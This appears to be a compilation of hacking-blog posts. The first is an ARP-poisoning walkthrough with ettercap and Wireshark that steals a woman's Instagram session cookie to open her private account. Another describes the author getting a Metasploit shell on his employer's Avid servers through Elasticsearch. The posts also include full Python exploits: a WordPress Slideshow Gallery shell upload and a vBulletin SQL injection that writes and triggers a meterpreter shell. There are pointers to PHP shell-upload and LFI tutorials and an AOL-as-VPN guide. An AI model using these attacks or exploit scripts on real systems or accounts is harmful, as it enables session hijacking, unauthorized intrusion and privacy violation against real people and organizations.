First of all connect to access point that you want to sniff.

Open ettercap.


Click "Sniff => Unified Sniffing"


Choose your interface. In this case i use "en0"


Now we scan all hosts in the network with shortcut "ctrl+s" or click "Hosts => Scan fot hosts"


Look at the box below, it will show you alive hosts.


Now show the hosts list by click "Hosts => Hosts list" or just press "H".


Add the gateway into Target 1. In this case the gateway is 192.168.0.1.
Select gateway IP address and click "Add to Target 1".
As you can see below 192.168.0.1 has been added to TARGET1


Add the rest of the clients to Target 2.
Block all clients and click "Add to Target 2"


Now start the MITM attack (ARP Poisoning).


Thick the option "Sniff remote connections" and click OK.


Start the sniffing by clicking "Start => Start sniffing".


Open wireshark to capture packet.


Click "Interface List" to choose your interface.
My interface is "en0" and click "Start".


Let wireshark capture packet a while.
Filter packet with "http.cookie" to see clients cookies.


I have clients who open instagram app using iPhone.
I can see the username igfl=blablabla (the one that i blured).
As we can see, we got instagram cookie now.


In order to paste this cookie into browser, you need to install Greasemonkey plugin + Cookie injector in firefox (right corner).


Right on the "Request URI", choose "Copy => Value" and paste it into firefox.


The page will be like this coz you not logged in ({"status":"fail","message":"login_required"}).


When i open the target instagram on my phone, the user is private.



Now copy the instagram cookie on wireshark.
Right click on "Cookie:", choose "Copy => Bytes => Printable Text Only".


Paste "Wireshark Cookie Dump" on firefox by press "alt+c".


Refresh the page and you will see like a line of code but it's not. It's the instagram users.
We are now logged in to instagram.


Here is the profile page. As you can see on the right profile, i now have access to her instagram.


Happy sniffing guys.. :))

Well since my office use Avid system as their broadcast system, i try to hack into the system and it works. Actually this vulnerability is not in Avid system but in Elasticsearch (CVE-2014-3120). This vulnerability affected Avid system and this is a high risk vulnerability. Avid still use vulnerable Elasticsearch application.

Here is the proof of concept.

Attacker can execute command to read files on server.


Here is the exploit to read files on servers.


Here is the metasploit screenshot how i got shell on Avid servers using ElasticSearch Dynamic Script Arbitrary Java Execution module.


Pwnd. :)



If people from Avid see this post, please fix this vulnerability ASAP. This system cost a lot of money.

Thank You!

/eof


This is video tutorial about uploading PHP Shell to target using php://input parameter.
An old video but still works untill now.

Tools needed for this trick is Live HTTP Header and Tamper Data from Mozilla Addons.
You can download the video here.

Thanks for download and watching.. :)


Here is my video tutorial about LFI injection using /proc/self/environ.
This an old trick but works till now.
For better view open the html file on your browser.
You can download it here
Tools: Mozilla Firefox & Tamper Data Plugin.
Thanks for watching.. :)


WordPress Slideshow Gallery 1.4.6 suffer for shell upload vuln.
Bug founded by Claudio Viviani.
This from last month bug but i think there is more target coz it's WordPress. :)

Description
Feature content in beatiful and fast JavaScript powered slideshow gallery showcases on your WordPress website. You can easily display multiple galleries throughout your WordPress website displaying your custom added slides, slide galleries or showing slides from WordPress posts/pages. The slideshow is flexible, all aspects can easily be configured and embedding/hardcoding the slideshow gallery is a breeze.
Here is the exploit and how to use it. Exploit written in python.
You can download it here
#!/usr/bin/env python## WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit## WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)## Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/## Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it### Disclaimer:## This exploit is intended for educational purposes only and the author# can not be held liable for any kind of damages done whatsoever to your machine,# or damages caused by some other,creative application of this exploit.# In any case you disagree with the above statement,stop here.### Requirements:## 1) Enabled user management slide# 2) python's httplib2 lib#    Installation: pip install httplib2## Usage:## python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php## Backdoor Location:## http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php## Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0#
# http connectionimport urllib, httplib2, sys, mimetypes# Args managementimport optparse# Error managementimport socket, httplib, sys# file managementimport os, os.path
# Check urldef checkurl(url):    if url[:8] != "https://" and url[:7] != "http://":        print('[X] You must insert http:// or https:// procotol')        sys.exit(1)    else:        return url
# Check if file exists and has readabledef checkfile(file):    if not os.path.isfile(file) and not os.access(file, os.R_OK):        print '[X] '+file+' file is missing or not readable'        sys.exit(1)    else:        return file# Get file's mimetypedef get_content_type(filename):    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Create multipart headerdef create_body_sh3ll_upl04d(payloadname):
   getfields = dict()   getfields['Slide[id]'] = ''   getfields['Slide[order]'] = ''   getfields['Slide[title]'] = 'h0m3l4b1t'   getfields['Slide[description]'] = 'h0m3l4b1t'   getfields['Slide[showinfo]'] = 'both'   getfields['Slide[iopacity]'] = '70'   getfields['Slide[type]'] = 'file'   getfields['Slide[image_url]'] = ''   getfields['Slide[uselink]'] = 'N'   getfields['Slide[link]'] = ''   getfields['Slide[linktarget]'] = 'self'   getfields['Slide[title]'] = 'h0m3l4b1t'
   payloadcontent = open(payloadname).read()
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'   CRLF = '\r\n'
   L = []   for (key, value) in getfields.items():      L.append('--' + LIMIT)      L.append('Content-Disposition: form-data; name="%s"' % key)      L.append('')      L.append(value)
   L.append('--' + LIMIT)   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))   L.append('Content-Type: %s' % get_content_type(payloadname))   L.append('')   L.append(payloadcontent)   L.append('--' + LIMIT + '--')   L.append('')   body = CRLF.join(L)   return body
banner = """
 $$$$$$\  $$\ $$\       $$\                     $$\$$  __$$\ $$ |\__|      $$ |                    $$ |$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ | \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  | \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/


             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/                                                            $$\   $$ |                                                            \$$$$$$  |                                                             \______/
                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
                          =============================================                          - Release date: 2014-08-28                          - Discovered by: Jesus Ramirez Pichardo                          - CVE: 2014-5460                          =============================================
                                          Written by:
                                        Claudio Viviani
                                     http://www.homelab.it
                                        info@homelab.it                                     homelabit@protonmail.ch
                                https://www.facebook.com/homelabit                                https://twitter.com/homelabit                                https://plus.google.com/+HomelabIt1/                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww"""
commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')commandList.add_option('-t', '--target', action="store",                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",                  )commandList.add_option('-f', '--file', action="store",                  help="Insert file name, ex: shell.php",                  )commandList.add_option('-u', '--user', action="store",                  help="Insert Username",                  )commandList.add_option('-p', '--password', action="store",                  help="Insert Password",                  )commandList.add_option('--timeout', action="store", default=10, type="int",                  help="[Timeout Value] - Default 10",                  )
options, remainder = commandList.parse_args()
# Check argsif not options.target or not options.user or not options.password or not options.file:    print(banner)    commandList.print_help()    sys.exit(1)
payloadname = checkfile(options.file)host = checkurl(options.target)username = options.userpwd = options.passwordtimeout = options.timeout
print(banner)
url_login_wp = host+'/wp-login.php'url_admin_slideshow = host+'/wp-admin/admin.php?page=slideshow-slides&method=save'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)
# Wordpress login POST Databody = { 'log':username,         'pwd':pwd,         'wp-submit':'Login',         'testcookie':'1' }# Wordpress login headers with Cookieheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',            'Content-type': 'application/x-www-form-urlencoded',            'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }try:    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))    if len(response['set-cookie'].split(" ")) < 4:    #if 'httponly' in response['set-cookie'].split(" ")[-1]:        print '[X] Wrong username or password'        sys.exit()    else:        print '[+] Username & password ACCEPTED!\n'
        # Create cookie for admin panel        if 'secure' in response['set-cookie']:            c00k13 = response['set-cookie'].split(" ")[6]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[10]        else:            c00k13 = response['set-cookie'].split(" ")[5]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[8]
        bodyupload = create_body_sh3ll_upl04d(payloadname)
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',                   'Cookie': c00k13,                   'content-type': content_type,                   'content-length': str(len(bodyupload)) }        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)
        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:            print '[!] Shell Uploaded!'            print '[+] Check url: '+host+'/wp-content/uploads/slideshow-gallery/'+payloadname.lower()+' (lowercase!!!!)'        else:            print '[X] The user can not upload files or plugin fixed :((('
except socket.timeout:    print('[X] Connection Timeout')    sys.exit(1)except socket.error:    print('[X] Connection Refused')    sys.exit(1)except httplib.ResponseNotReady:    print('[X] Server Not Responding')    sys.exit(1)except httplib2.ServerNotFoundError:    print('[X] Server Not Found')    sys.exit(1)except httplib2.HttpLib2Error:    print('[X] Connection Error!!')    sys.exit(1)


In this tutorial, i will show you how to use AOL Desktop Software (version 9.1) as a Virtual Private Network (VPN).

First download AOL Desktop 9.1. Search on Google to download.

Register new email on mail.aol.com

After download, install AOL Desktop 9.1.

Let me check my IP address first. I have Indonesian IP address.












Open AOL 9.1 and click Connect Options













Then click Advanced Broadband Settings


















Click Continue










AOL Setup will be pop up, then choose Broadband tab and click Add a Broadband Profile















Fill the Profile Name for example aolvpn or whatever you like and click Add















On Connection Type choose Home Network and click Save















If AOL Desktop ask for username and password, fill it with the one that you created before.
On Connection choose Profile Name that you created. In this case my Profile Name is aolvpn.













Logging in to AOL...













Successfully connected to AOL












Check my IP address again.. It's changed now! yeey..












Well thats all.. :)
Let me know if you guys having trouble with this.. Save browsing folks!


  1. vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server.
  2. This vulnerability founded by oststrom. Here the exploit code.
  3. #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, cookielib, urllib, json, hashlib class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self,baseurl,params, debuglevel=1):
    self.cookies = cookielib.LWPCookieJar()
    handlers = [
    urllib2.HTTPHandler(debuglevel=debuglevel),
    urllib2.HTTPSHandler(debuglevel=debuglevel),
    urllib2.HTTPCookieProcessor(self.cookies)
    ]
    self.browser = urllib2.build_opener(*handlers)
    self.baseurl=baseurl
    self.params = params

    def call(self,path="",data={}):
    assert(isinstance(data,dict))
    data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data)
    req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req)

    def call_json(self,path=None,data={}):
    try:
    x=self.call(path,data).read()
    print "raw_response", x
    resp = json.loads(x)
    except urllib2.HTTPError, he:
    resp = he.read()
    return resp def vb_init_api(self):
    params = {'api_m':'api_init'}
    params.update(self.params)
    data = self.call_json("?%s"%(urllib.urlencode(params)))
    self.session = data
    return data

    def vb_call(self, params):
    api_sig = self._vb_build_api_sig(params)
    req_params = self._vb_build_regstring(api_sig)
    params.update(req_params)
    data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
    if not isinstance(data, dict):
    return data
    if 'errormessage' in data['response'].keys():
    raise Exception(data)
    return data def _ksort(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( "%s=%s"%(key,value))
    return "&".join(ret) def _ksort_urlencode(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( urllib.urlencode({key:value}))
    return "&".join(ret) def _vb_build_api_sig(self, params):
    apikey = self.params['apikey']
    login_string = self._ksort_urlencode(params)
    access_token = str(self.session['apiaccesstoken'])
    client_id = str(self.session['apiclientid'])
    secret = str(self.session['secret'])
    return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
    params = {
    'api_c':self.session['apiclientid'],
    'api_s':self.session['apiaccesstoken'],
    'api_sig':api_sig,
    'api_v':self.session['apiversion'],
    }
    return params
    if __name__=="__main__":
    TARGET = "http://192.168.220.131/vbb4/api.php"
    APIKEY = "4FAVcRDc"
    REMOTE_SHELL_PATH = "/var/www/myShell.php"
    TRIGGER_URL = "http://192.168.220.131/myShell.php"
    DEBUGLEVEL = 0 # 1 to enable request tracking
    ### 2. sqli - simple - write outfile
    print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
    params = {'clientname':'fancy_exploit_client',
    'clientversion':'1.0',
    'platformname':'exploit',
    'platformversion':'1.5',
    'uniqueid':'1234',
    'apikey':APIKEY}
    x = Exploit(baseurl=TARGET,params=params)

    vars = x.vb_init_api()
    print vars
    '''
    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
    'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
    })

    print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
    '''
    ### 3. sqli - put meterpreter shell and trigger it
    print "[ 3 ] - sqli - meterpreter shell + trigger"
    with open("./meterpreter_bind_tcp") as f:
    shell = f.read() shell = shell.replace("","") #cleanup tags
    shell = shell.encode("base64").replace("\n","") #encode payload
    shell = ""%shell # add decoderstub
    shell = "0x"+shell.encode("hex") # for mysql outfile


    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
    print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
    print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST= E"
    print "[ *] shell active ... waiting for it to die ..."
    print urllib2.urlopen(TRIGGER_URL)
    print "[ ] shell died!"
    print "-- quit --"